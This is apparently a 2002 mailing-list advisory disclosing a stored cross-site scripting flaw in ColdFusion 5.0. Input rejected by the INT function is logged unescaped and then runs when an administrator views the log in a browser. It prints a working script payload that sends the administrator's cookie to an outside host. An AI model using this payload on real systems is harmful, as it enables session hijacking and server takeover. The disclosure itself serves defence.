Cross-site scripting vulnerability in CF 5.0. This issue was brought up to macromedia on July 22nd, 2002. Macromedia issued a fix to me, but I have not seen the fix available to the public. the coldfusion administrator allows you to view your application log via your web browser. Under certain conditions, it is possible to remotely alter coldfusions application log. take the following code:
<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#"> SELECT * FROM Products Where ProductId = #int(url.productid)# </CFQUERY> if the INT function encounters a value that is not numeric, it throws an exception and writes the value that was passed to application.log. Should an unsuspecting administrator view the log file via their web browser, script could be executed. Analyze this code: if url.productid (from the above example) were passed in as: <iframe name="frame1" width="0" height="0"></iframe> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="; + document.cookie</script> this would enable an attacker to steal the value of the coldfusion administrators cookie. Decrypting the coldfusion admin's password is well documented, and exposes a mild-moderate threat to server security. **NOTE: there are dozens of other functions that throw exceptions similar to the INT function. __________________________________________________ Do you Yahoo!? Yahoo! Mail Plus - Powerful. Affordable. Sign up now. http://mailplus.yahoo.com
